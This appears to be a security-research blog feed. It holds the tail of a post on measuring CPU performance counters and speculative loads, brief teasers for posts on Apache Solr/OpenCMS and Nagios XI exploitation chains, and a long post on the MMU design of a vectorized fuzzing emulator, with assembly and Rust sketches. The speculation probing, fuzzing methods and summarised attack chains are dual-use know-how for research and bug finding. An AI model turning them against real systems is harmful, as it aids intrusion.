In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!

Noise…

In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  48C7042500000000  mov qword [0x0],0x0
         -00000000
0000001D  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000029  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000035  48C7042500000000  mov qword [0x0],0x0
         -00000000

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000041  B98F030000        mov ecx,0x38f
00000046  31C0              xor eax,eax
00000048  31D2              xor edx,edx
0000004A  0F30              wrmsr

Here we’re just going to write to NULL 4 times. This might sound bad, but in this example I mapped NULL in as normal write-back memory. Nothing crazy, just treat it as a valid address.

But here are the results:

Noise Sample

Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.

These results can get a bit more complex to interpret, but it’s still relevant data nevertheless. Changing the code under test, cleaning up the environment to be more deterministic, etc., can often improve the quality and visibility of the data.

Does it work with speculation?

Damn right it does! That was the whole point!

Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.

    // Start a TSX section, think of this as a `try {` block
    xbegin 2f

    // Read from -1, causing a fault
    mov rax, [-1]

    // Here's some loads shadowing the faulting load. These
    // should never occur, as the instruction above causes
    // an exception and thus execution should "jump" to the label `2:`

    .rept 32
        // Repeated load 32 times
        mov rbx, [0]
    .endr

    // End the TSX section, think of this as a `}` closing the
    // `try` block
    xend

2:
    // Here is where execution goes if the TSX section had
    // an exception, and thus where execution will flow

Speculation Sample

Both ports 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see many different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!

More data?

I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!


Conclusion

This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!

This tool is incredibly useful for validating hypotheses about behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!


Source?

Update: 8/19/2019

This kernel has too many sensitive features that I do not want to make public at this time…

However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel Orange Slice!


Exploiting Apache Solr through OpenCMS

13 April 2019 at 09:19
Tl;dr It’s possible to exploit a known Apache Solr vulnerability through OpenCMS. Introduction During one of my last Penetration Tests I was asked to analyze some OpenCMS instances. Before the assessment I wasn’t really familiar with OpenCMS, so I spent some time on the official documentation in order to understand how it works, what the default configuration is, and whether there are any security-related configurations I should check during the test.

Nagios XI 5.5.10: XSS to #

10 April 2019 at 13:10
Tl;dr A remote attacker could trick an authenticated victim (with “autodiscovery job” creation privileges) to visit a malicious URL and obtain a remote root shell via a reflected Cross-Site Scripting (XSS), an authenticated Remote Code Execution (RCE) and a Local Privilege Escalation (LPE). Introduction A few months ago I read about some Nagios XI vulnerabilities which got me interested in studying it a bit by myself. For those of you who don’t know what Nagios XI is I suggest you have a look at their website.

WebTech, identify technologies used on websites

8 March 2019 at 00:37
Introduction We’re very proud to release WebTech as open-source software. WebTech is a Python software that can identify web technologies by visiting a given website, parsing a single response file or replaying a request described in a text file. This way you can have reproducible results and minimize the requests you need to make to a target website. The RECON phase in a Penetration Test is one among the most important ones.

FridaLab – Writeup

4 February 2019 at 15:20
Today I solved FridaLab, a playground Android application for playing with Frida and testing your skills. The app is made of various challenges, with increasing difficulty, that will guide you through Frida’s potential. This is a writeup with solutions to the challenges in FridaLab. We suggest the reader take a look at it and try to solve it by themselves before reading further. In this writeup we will assume that the reader has a working environment with frida-server already installed on the Android device and frida-tools installed on the PC as well, since we will not cover those topics.

Vectorized Emulation: MMU Design

19 November 2018 at 19:10

Softserve

New vectorized emulator codenamed softserve

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up.

Check out the intro

This is the continuation of a multipart series. See the introduction post here

This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!

Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!

The code

This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found here. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.

By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.

It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the correct operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.

Intro

Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further, the MMU design used here is also designed to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has its own permission bits. Since vectorized emulation is meant for fuzzing, it’s also important that the memory state can quickly be restored to its original state so a new fuzz iteration can be started.

During this blog we introduce a few big concepts:

  • Differential restores
  • Byte-level permissions
  • Read-after-write memory (uninitialized memory tracking)
  • Gage fuzzing
  • Aliased/CoW memory
  • Deduplicated memory
  • Technical details about the IL relevant to the MMU
  • Painful details about everything

Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges 0xffff... and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, where things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.

The problem

Before we get into describing the solution, let’s address what the problem is in the first place!

When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access its own memory, and that it isn’t overwriting the emulator’s own memory. To do this there are multiple traditional solutions:

  • Restrict the address space of the guest such that it can fit entirely in the emulator’s address space
  • Use a data structure to emulate a sparse guest’s memory space
  • Create a new process/VM with only the guest’s memory mapped in

The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via mmap or VirtualProtect. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space 0xffff... and beyond. This memory is typically reserved for the kernel. This is the model used by things like qemu-user as it is super fast and works great for well-behaving userland applications. By setting the QEMU_GUEST_BASE environment variable you can change this base and set the size with QEMU_RESERVED_VA.

The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.

The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This will make the emulator tied to an architecture, might require a driver, and, like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section.


History

Feel free to skip this section if you don’t care about context

To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.

First generation

The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using qemu-user, but rather qemu-system. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory and save time during resets. This had a huge improvement for my hypervisor so it was natural for me to just copy it over to QEMU so I could get the same benefits.

Second generation

While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages, allowed me to reset more specific dirty pages, and reduced the overall work for resets.

Third generation

At this point I was tinkering around with different page table shapes to find which worked fastest. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like malloc(). By setting permissions directly to the size actually requested by malloc() we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.

Fourth generation

I ended up designing my own emulator for MIPS32; performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use a JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.

At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.

For example if the guest wanted to access address 0x13370000, it would just directly dereference the memory at 0x13370000. No translation, no base applied, simple.

You can see this code in the srcs/emu folder in falkervisor.

I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VMs’ memory.

Fifth generation

The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve its ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would be all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).

Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what qemu-user does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.

Sixth generation

The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down, as they blocked until the OS cleaned up their resources. Further, commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design…


Page Tables

Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.

Page table

In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as [9, 9, 9, 9, 12] according to my dynamic paging model. This syntax will be explained later.

For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.

Here’s the actual metadata of a 4 KiB page on 64-bit Intel:

Page table metadata


The overall design

My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.

When designing the new MMU there were a few critical features it needed:

  • Byte level permissions
  • Fast snapshot/restore times
  • A data structure that could be quickly traversed in JIT
  • Quick process start times
  • The ability to handle full 64-bit address spaces
  • Low memory usage (we need to run 2048 VMs)
  • Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)
  • Must be easily tested for correctness
  • Ability to track uninitialized memory at a byte-level
  • Read-only memory shared between all cores

Applying byte-level permissions

So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?

Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.

The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.
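To make this a bit more concrete, here is a minimal sketch of what such allocator hooks could look like. The Mmu type, its set_permissions method, and the permission constants are hypothetical stand-ins (not the emulator's real API); the only point is that permissions get restricted to the exact requested size, so anything past the end faults.

// Hypothetical allocator hooks applying byte-level permissions. All names
// here are stand-ins for illustration only.
const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;

struct Mmu;

impl Mmu {
    /// Apply `perms` to every byte in `[addr, addr + size)`
    fn set_permissions(&mut self, addr: u64, size: u64, perms: u8) {
        // ... walk the page tables and update the permission bytes ...
        let _ = (addr, size, perms);
    }
}

/// Called when the guest hits the breakpoint on its allocation routine
fn hook_malloc(mmu: &mut Mmu, ret_addr: u64, requested_size: u64) {
    // Only the exact requested size becomes accessible; guard bytes and
    // allocator slack past the end keep no permissions, so even a 1-byte
    // out-of-bounds access faults
    mmu.set_permissions(ret_addr, requested_size, PERM_READ | PERM_WRITE);
}

/// Called when the guest hits the breakpoint on its free routine
fn hook_free(mmu: &mut Mmu, addr: u64, size: u64) {
    // Strip all permissions so use-after-frees fault on the first access
    mmu.set_permissions(addr, size, 0);
}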

We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.

To remedy these problems there are a few solutions. We can use page heap in the application we’re taking a snapshot in, which will always ensure we have a page after the allocation we can play with for guard bytes. Further, page heap stores the requested size in the metadata so we can get perfect byte-level permissions applied.

If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.

Getting even fancier

When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.


Design features

Basics of the vectorized model

This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.

Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VMs’ memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However in the common case memory is accessed at the same address and does not straddle an 8-byte boundary. It’s worth it.

For reference the cost of a single load instruction vmovdqa64 is about 4-5 cycles, where a vpgatherqq load is 20-30 cycles. Unless memory is frequently accessed from differing addresses or straddles 8-byte boundaries, interleaving is always worth it.

VM interleaving looks as follows:

chart simplified to show 4 lanes instead of 8

Guest Address | Host Address | Qword 1 | Qword 2 | Qword 3 | ... | Qword 8
0x0000        | 0x0000       |       1 |       2 |       3 | ... |      33
0x0008        | 0x0040       |      32 |      74 |      55 | ... |      45
0x0010        | 0x0080       |      24 |      24 |      24 | ... |      24

This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.
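As a quick sanity check of the table above, here is a tiny sketch of the address math this interleaving implies (ignoring the permission bytes discussed later; NUM_VMS and the function name are made up for illustration):

/// Number of VMs interleaved on a core
const NUM_VMS: u64 = 8;

/// Host byte offset of `guest_addr` for VM `lane` under 8-byte interleaving.
/// A sketch only; the real layout also interleaves permission bytes.
fn interleaved_offset(guest_addr: u64, lane: u64) -> u64 {
    let qword  = guest_addr / 8; // which 8-byte chunk of guest memory
    let within = guest_addr % 8; // byte offset inside that chunk
    qword * (NUM_VMS * 8) + lane * 8 + within
}

fn main() {
    // Matches the table: guest 0x0008 lives at host 0x0040, 0x0010 at 0x0080
    assert_eq!(interleaved_offset(0x0008, 0), 0x0040);
    assert_eq!(interleaved_offset(0x0010, 0), 0x0080);
}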

How do we build a testable model?

To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naively as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needed for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!

64-bit address spaces

To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.

Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called PAGE_TABLE_LAYOUT. This is used in reality in the form: const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];.

This array defines the number of bits used for translating each level in the page table, and PAGE_TABLE_DEPTH sets the number of levels in the page table. In the example above this shows that we use the top 16 bits as the index for the first level, the next 16 bits for the next level, the next 16 bits again for another level, a 13-bit level, and finally a 3-bit page size. As long as this PAGE_TABLE_LAYOUT adds up to 64 bits, contains at least 2 entries (a 1-level page table), and has a final translation size of at least 8 bytes (like in the example), the MMU and JITs will adapt to it. This allows profiling to be done of a specific target and the page table to be modified to whatever shape works best. This also allows trade-offs between performance and memory usage if needed.
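To illustrate how a layout like this carves up an address (just a sketch of the indexing scheme, not the actual implementation), each level’s index is simply a bit-slice of the guest address:

/// Bits consumed at each level; the last entry is the page-offset bits.
/// Must sum to 64.
const PAGE_TABLE_DEPTH: usize = 5;
const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];

/// Split a guest address into one index per level plus the final page offset
fn split_address(addr: u64) -> [u64; PAGE_TABLE_DEPTH] {
    let mut indices = [0u64; PAGE_TABLE_DEPTH];
    let mut remaining_bits = 64u32;

    for (ii, &bits) in PAGE_TABLE_LAYOUT.iter().enumerate() {
        remaining_bits -= bits;
        indices[ii] = (addr >> remaining_bits) & ((1u64 << bits) - 1);
    }

    indices
}

fn main() {
    // The top 16 bits index the first level, the low 3 bits are the offset
    let idx = split_address(0x1122_3344_5566_7788);
    assert_eq!(idx[0], 0x1122);
    assert_eq!(idx[4], 0x7788 & 0x7);
}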

Fast restores

When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table; if it was accessed I would recurse to the next level, otherwise I would skip it. At the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.

To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.

Instead of walking page tables I now just append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. This was a decision driven by actual data on real targets; it’s much faster.

If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.
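A minimal sketch of that bookkeeping is below; the names, the (guest, host) pair, and the bit position are assumptions for illustration, but it shows how the final-level dirty bit keeps the linear dirty list duplicate-free and how exhaustion becomes a special VM exit:

/// Dirty bit stored in the final level page table entries (assumed position)
const DIRTY_BIT: u64 = 1 << 0;

struct DirtyList {
    /// (guest address, translated host address) pairs, walked at reset time
    dirty:    Vec<(u64, u64)>,
    /// Maximum entries before we force a VM exit to flush at Rust-level
    capacity: usize,
}

impl DirtyList {
    /// Returns `false` if the list is full and a VM exit must be taken
    fn record_write(&mut self, entry: &mut u64, guest: u64, host: u64) -> bool {
        if *entry & DIRTY_BIT == 0 {
            if self.dirty.len() >= self.capacity {
                return false; // dirty list exhausted, special VM-exit status
            }
            *entry |= DIRTY_BIT;            // never add this page twice
            self.dirty.push((guest, host)); // reset walks only this vector
        }
        true
    }
}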

Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called Page Modification Logging). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.

Permissions

On classic x86 (and really any other architecture) permission bits are added at each level of the page table. This allows the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VMs at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.

Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.

There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.

In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.

In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to both the permissions and memory contents. Further, in memory the permissions come first, followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearly and potentially get a speedup from the hardware prefetchers.

When permissions and contents are laid out in a pretty format it looks something like:

MMU layout, simplified to 4 lanes instead of 8

We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.

Uninitialized memory tracking

To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.

On all writes to memory the RaW bit is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than to have a conditional operation.

Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. malloc()ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!
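Here’s a small sketch of that write-path update, with made-up bit positions (the real bit layout may differ); a shift-and-or propagates RaW into the read bit with no branching:

/// Permission bits, one byte of these per guest byte per VM (bit positions
/// are assumptions for this sketch)
const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
const PERM_EXEC:  u8 = 1 << 2;
const PERM_RAW:   u8 = 1 << 3; // read-after-write

/// Update one permission byte during a write: the RaW bit is shifted down
/// and ORed into the read bit unconditionally
fn update_perm_on_write(perm: u8) -> u8 {
    perm | ((perm & PERM_RAW) >> 3)
}

fn main() {
    // malloc()ed memory: writable + RaW, but not yet readable
    let uninit = PERM_WRITE | PERM_RAW;
    assert_eq!(uninit & PERM_READ, 0);

    // After the first write the byte becomes readable
    let written = update_perm_on_write(uninit);
    assert_ne!(written & PERM_READ, 0);
}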


Gage fuzzing

Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.

As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.

This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.

This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!

I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.


Theory into practice

So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.

We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.

64-bit saves the day

Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.

Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.

In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.

Handling non-present pages

Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.

If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.
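A scalar walk under this scheme ends up being almost trivial. Here’s a sketch (entry layout, bit positions, and the read_entry callback are assumptions; the real JIT emits this inline rather than calling a closure):

/// Metadata bits stored only in final level entries (assumed positions)
const DIRTY_BIT:   u64 = 1 << 0;
const ALIASED_BIT: u64 = 1 << 1;
const COW_BIT:     u64 = 1 << 2;
const META_MASK:   u64 = DIRTY_BIT | ALIASED_BIT | COW_BIT;

enum Translate {
    /// Pointer to the interleaved permission+content backing for the page
    Page(u64),
    /// A NULL entry was hit somewhere during the walk
    Fault,
}

/// Scalar walk sketch: `indices` holds one index per table level (the final
/// page-offset bits are applied separately), `read_entry(table, idx)` stands
/// in for dereferencing host memory.
fn walk(mut table: u64, indices: &[u64],
        read_entry: impl Fn(u64, u64) -> u64) -> Translate {
    for (depth, &idx) in indices.iter().enumerate() {
        let entry = read_entry(table, idx);
        if entry == 0 {
            return Translate::Fault; // non-present, deliver a VM exit
        }
        table = if depth == indices.len() - 1 {
            entry & !META_MASK // final level: strip dirty/aliased/cow bits
        } else {
            entry              // intermediate levels: nothing to mask off
        };
    }
    Translate::Page(table)
}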

What is a page fault?

In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a ret allows us to exit from the emulator at any time.

Further since it’s possible VMs could have different permissions or page tables, we report a caused_vmexit mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.

Memory costs

Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.

Saving time and memory

We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This meant it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.

To remedy this, everything we do is lazy. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.

VMs have no memory to start off

